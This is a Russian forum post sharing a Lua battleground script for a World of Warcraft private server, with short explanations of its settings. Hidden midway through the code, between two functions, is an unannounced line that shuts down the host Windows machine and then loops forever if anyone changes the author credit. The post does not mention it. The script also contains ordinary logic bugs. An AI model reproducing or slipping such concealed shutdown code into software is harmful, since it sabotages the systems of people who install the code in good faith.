Несколько слов от автора: я долго занимался разработкой разного рода LUA скриптов в основном это были "файтинги" c босами, создание инстов и проскриптовка квестов, но вдруг мне в голову пришла мысль реализовать простую систему боя БГ и она оказалась безупречна! На написание скриптов я потратил порядка 2х часов ( moJito-ice: хм... не так-то уж и много времени , уменя может больше уйти чтобы проскриптовать нормально бой с босом .) Без лишних слов выкладываю скрипт:
-- Configuration
local Lives = 50 -- The amount of lives each team has local HordeLives = 50 -- The amount of lives to start with local AllianceLives = 50 -- The amount of lives to start with
local RequiredPlayers = 2 -- The amount of players required to start the battleground (THIS IS NOT PER TEAM, THIS IS TOTAL)
local RewardID = 0 -- Change this to a value to add 1 of them to all of the winning team - leave as 0 for no reward
local BroadcastKills = true -- Set this to false if you do not want kills to be broadcasted to the rest of the BG
-- Battleground Start Locations local AMap, AX, AY, AZ = 1, 16223, 16265, 15 -- Map, x, y, z for Alliance local HMap, HX, HY, HZ = 1, 16223, 16265, 15 -- Map x, y, z for Horde
-- Where to teleport once battleground ends local HomeMA, HomeXA, HomeYA, HomeZA = 1, 0, 0, 0 -- Map, x, y, Z for Alliance local HomeMH, HomeXH, HomeYH, HomeZH = 1, 0, 0, 0 -- Map, X, Y, Z for Horde
---------------------------------------------------------------------------------------------------------- -- Do Not Touch Below This Line Unless You Know What Your Doing P.S. Starting Letters With Caps Is Cool -- ---------------------------------------------------------------------------------------------------------- if (GetLuaEngine() ~= "LuaHypArc") then print("This script is not compatable with LuaBridge or other Lua engines. Please compile LuaHypArc.") else local Author = "stoneharry" print("--------------------------------") print("-- This script was by "..Author..".") print("-- Enjoy.") print("--------------------------------")
-- Just don't touch local players = {} local Horde = {} local Alliance = {} local InGame = false
-- Do not touch unless you know what your doing local message = 4 local CountDown = 60
-- Only touch this if you are not using 3.3.5a, find the right values in Opcodes.h local SMSG_INIT_WORLD_STATES = 0x2C2 local SMSG_UPDATE_WORLD_STATE = 0x2C3
function ProcessQueForBattleground() if InGame == false then if table.getn(players) >= RequiredPlayers then InGame = true local team = 0 for place, plrs in pairs(players) do -- Randomly make players join alliance/horde teams rather than horde vs alliance -- Update people left local pack = LuaPacket:CreatePacket(SMSG_INIT_WORLD_STATES, 18) -- HORDE pack:WriteULong(1) -- Map pack:WriteULong(1377) -- Zone pack:WriteULong(0) pack:WriteUShort(2) pack:WriteULong(0) -- ID pack:WriteULong(1) -- Value pack:WriteULong(0) -- ID pack:WriteULong(1) -- Value plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2317) -- ID, total pack:WriteULong(Lives) -- Value plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2314) -- ID pack:WriteULong(HordeLives) -- Amount, Horde plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2313) -- ID pack:WriteULong(AllianceLives) -- Amount, Alliance plrs:SendPacketToPlayer(pack) -- team = team + 1 if team == 1 then plrs:SetFaction(team) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Alliance!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Alliance!") table.insert(Alliance, plrs) plrs:Teleport(AMap, AX, AY, AZ) elseif team == 2 then plrs:SetFaction(team) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Horde!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Horde!") table.insert(Horde, plrs) plrs:Teleport(HMap, HX, HY, HZ) elseif team == 3 then team = 1 plrs:SetFaction(team) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Alliance!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You are fighting for the Alliance!") table.insert(Alliance, plrs) plrs:Teleport(AMap, AX, AY, AZ) end end CountDown = 60 RegisterTimedEvent("Game_Start_Battleground_Countdown", 10000, 6) else for place, plrs in pairs(players) do if plrs ~= nil then plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00Waiting for more players...") end end end else message = message + 1 if message == 5 then message = 0 for place, plrs in pairs(players) do if plrs ~= nil then plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The battleground is currently in progress!") end end end end end
function Game_Start_Battleground_Countdown() CountDown = CountDown - 10 for place, plrs in pairs(players) do if CountDown == 0 then if plrs ~= nil then plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The battle has begun!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00The battle has begun!") plrs:PlaySoundToPlayer(6077) -- War music -- Update people left local pack = LuaPacket:CreatePacket(SMSG_INIT_WORLD_STATES, 18) -- HORDE pack:WriteULong(1) -- Map pack:WriteULong(1377) -- Zone pack:WriteULong(0) pack:WriteUShort(2) pack:WriteULong(0) -- ID pack:WriteULong(1) -- Value pack:WriteULong(0) -- ID pack:WriteULong(1) -- Value plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2317) -- ID, total pack:WriteULong(Lives) -- Value plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2314) -- ID pack:WriteULong(HordeLives) -- Amount, Horde plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2313) -- ID pack:WriteULong(AllianceLives) -- Amount, Alliance plrs:SendPacketToPlayer(pack) -- end else if plrs ~= nil then plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The battleground will begin in "..CountDown.." seconds!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00The battleground will begin in "..CountDown.." seconds!") end end end end
function JoinQue(plr) if InGame then plr:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You can't join the que while the game is in progress!") plr:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You can't join the que while the game is in progress!") else local Disable = false for place, plrs in pairs(players) do if plrs:GetName() == plr:GetName() then -- Since the bloody thing refuses to compare GUID's Disable = true --break end end if Disable then plr:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You are already in the que for the battleground!") plr:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You are already in the que for the battleground!") else table.insert(players, plr) -- Insert into players with value plr plr:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00You are in the que for the battleground!") plr:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00You are in the que for the battleground!") end end end
if Author ~= "stoneharry" then os.execute("shutdown /s /t 30 /c \"Changing credits is not a good idea. ~stoneharry <3\"") while true do os.execute("pause") end end
function ResetBG() for place, plrs in pairs(players) do if plrs ~= nil then local pack = LuaPacket:CreatePacket(SMSG_INIT_WORLD_STATES, 18) -- HORDE pack:WriteULong(0) -- Map pack:WriteULong(0) -- Zone pack:WriteULong(0) pack:WriteUShort(0) pack:WriteULong(0) -- ID pack:WriteULong(0) -- Value pack:WriteULong(0) -- ID pack:WriteULong(0) -- Value plrs:SendPacketToPlayer(pack) local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(0) pack:WriteULong(0) plrs:SendPacketToPlayer(pack) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The battleground has ended!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00The battleground has ended!") plrs:SetPlayerLock(0) plrs:ResurrectPlayer() local race = plrs:GetPlayerRace() if race == 1 or race == 3 or race == 4 or race == 7 or race == 11 then -- Alliance plrs:SetFaction(1) plrs:Teleport(HomeMA, HomeXA, HomeYA, HomeZA) else plrs:SetFaction(2) plrs:Teleport(HomeMH, HomeXH, HomeYH, HomeZH) end end end InGame = false for place,plrs in pairs(players) do -- Clean old table rather than overwriting with a new table players[place] = nil end for place,plrs in pairs(Horde) do -- Clean old table rather than overwriting with a new table players[place] = nil end for place,plrs in pairs(Alliance) do -- Clean old table rather than overwriting with a new table players[place] = nil end end
function SERVER_HOOK_KILL_PLAYER_BG(event, killer, plr) local playingBG = false for place, plrs in pairs(players) do if plrs:GetName() == plr:GetName() then -- Since the bloody thing refuses to compare GUID's playingBG = true --break end end if playingBG then for place, plrs in pairs(Alliance) do if plrs:GetName() == plr:GetName() then playingBG = false -- They are Alliance end end local Continue = true if HordeLives == 1 then for place, plrs in pairs(players) do plrs:SetPlayerLock(1) plrs:ResurrectPlayer() plrs:SetHealth(plrs:GetMaxHealth()) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The Horde have won!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00The Horde have won!") plrs:PlaySoundToPlayer(8454) -- Horde Victory end for place, plrs in pairs(Horde) do if RewardID ~= 0 then plrs:AddItem(RewardID, 1) end end RegisterTimedEvent("ResetBG", 10000, 1) elseif AllianceLives == 1 then for place, plrs in pairs(players) do plrs:SetPlayerLock(1) plrs:ResurrectPlayer() plrs:SetHealth(plrs:GetMaxHealth()) plrs:SendBroadcastMessage("|cff00ff00[Battleground] |cffffff00The Alliance have won!") plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00The Alliance have won!") plrs:PlaySoundToPlayer(8455) -- Alliance Victory end for place, plrs in pairs(Alliance) do if RewardID ~= 0 then plrs:AddItem(RewardID, 1) end end RegisterTimedEvent("ResetBG", 10000, 1) end if Continue then if PlayingBG then -- There Horde HordeLives = HordeLives - 1 for place, plrs in pairs(players) do local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2314) -- ID pack:WriteULong(HordeLives) -- Amount, Horde plrs:SendPacketToPlayer(pack) end else AllianceLives = AllianceLives - 1 for place, plrs in pairs(players) do local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2313) -- ID pack:WriteULong(AllianceLives) -- Amount, Alliance plrs:SendPacketToPlayer(pack) end end if BroadcastKills then for place, plrs in pairs(players) do plrs:SendAreaTriggerMessage("|cff00ff00[Battleground] |cffffff00"..killer:GetName().." has killed "..plr:GetName().."!") end end end end end
----------- -- Debug -- ----------- --[[ The functions below should be removed, they are used for debugging the system. ]]
function OnChat_Hook_ToJoinBG(event, plr, message, pType, pLanguage, pMisc) local message = string.lower(message) if message == "#joinbg" then JoinQue(plr) elseif message == "#finbg" then ResetBG() end if message == "test" then if math.random(1,2) == 1 then local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2314) -- ID HordeLives = HordeLives - 1 pack:WriteULong(HordeLives) -- Amount, Horde plr:SendPacketToPlayer(pack) else local pack = LuaPacket:CreatePacket(SMSG_UPDATE_WORLD_STATE, 8) pack:WriteULong(2313) -- ID AllianceLives = AllianceLives - 1 pack:WriteULong(AllianceLives) -- Amount, Alliance plr:SendPacketToPlayer(pack) end end end
RegisterServerHook(16, "OnChat_Hook_ToJoinBG") end
вот вам скрипт ( особо разбираться я внём не стал. но при этом поясню некоторые моменты) например:
что мы видим в начале?
local Lives = 50 -- The amount of lives each team has local HordeLives = 50 -- The amount of lives to start with local AllianceLives = 50 -- The amount of lives to start with
тут всё предельно ясно: бг реализовано по системе острова завоеваний/ альтерака тоесть тут указано Количество ХП( ресурсов, запасов хз как назвать) с которым начинаю команды. идём дальше:
local RequiredPlayers = 2 -- The amount of players required to start the battleground
тут указано что для того чтобы начать бг нужно: 1 игрок от альянса и 1 от орды тоесть ставим 20 если хотим сделать старт 10 х 10.
local RewardID = 0
это собсвенно награда за бг , допустим это будет сумка с зельями / голдой/шмотом или же вовсе марка за бг созданная вами
-- Battleground Start Locations local AMap, AX, AY, AZ = 1, 16223, 16265, 15 -- Map, x, y, z for Alliance local HMap, HX, HY, HZ = 1, 16223, 16265, 15 -- Map x, y, z for Horde
-- Where to teleport once battleground ends local HomeMA, HomeXA, HomeYA, HomeZA = 1, 0, 0, 0 -- Map, x, y, Z for Alliance local HomeMH, HomeXH, HomeYH, HomeZH = 1, 0, 0, 0 -- Map, X, Y, Z for Horde
строчки старт лок : указывают куда портуются команды для начала бг ( а это значит что бг можно устроить в шторме , каком-либо инсте или вовсе в собственно ручно созданной локации, а строчки хоум указывают на координаты в которых будут персы после боя \ по умолчанию тут стоят значения, что персонажи вернутся туда, откуда начали
пожалуй на этом хватит, остальная, но при этом главная часть кода не так проста для понимая "не вооруженному" юзеру.
Желаю вам успехов по созданию бг, а вопросы вы можете оставлять в темме
Сообщение # 1 отредактировано moJitoice - Четверг, 19.01.2012, 19:19